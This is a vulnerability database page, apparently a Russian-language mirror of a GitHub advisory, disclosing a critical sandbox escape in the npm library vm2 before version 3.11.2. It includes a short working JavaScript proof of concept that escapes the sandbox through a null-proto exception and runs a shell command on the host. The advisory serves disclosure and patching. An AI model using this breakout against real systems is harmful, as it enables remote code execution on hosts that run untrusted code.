Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-9vg3-4rfj-wgcm

Опубликовано: 08 мая 2026
Источник: github
Github: Прошло ревью
CVSS3: 9.8

Описание

vm2 has Sandbox Breakout Through Null Proto Exception

Summary

VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details

In handleException due to // SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`) exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host Function object.

PoC

const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run(` const o = {__proto__: null}; try { throw o; } catch (e) { e.f = Buffer.prototype.inspect o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); } `));

Impact

Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.

Пакеты

Наименование

vm2

npm
Затронутые версииВерсия исправления

< 3.11.2

3.11.2

EPSS

Процентиль: 53%
0.00812
Низкий

9.8 Critical

CVSS3

Дефекты

CWE-668

Связанные уязвимости

CVSS3: 9.8
redhat
3 месяца назад

vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.2, This vulnerability is fixed in 3.11.2.

CVSS3: 9.8
nvd
3 месяца назад

vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.2, This vulnerability is fixed in 3.11.2.

CVSS3: 9.8
fstec
3 месяца назад

Уязвимость библиотеки vm2 пакетного менеджера NPM, позволяющая нарушителю выполнять произвольные команды

EPSS

Процентиль: 53%
0.00812
Низкий

9.8 Critical

CVSS3

Дефекты

CWE-668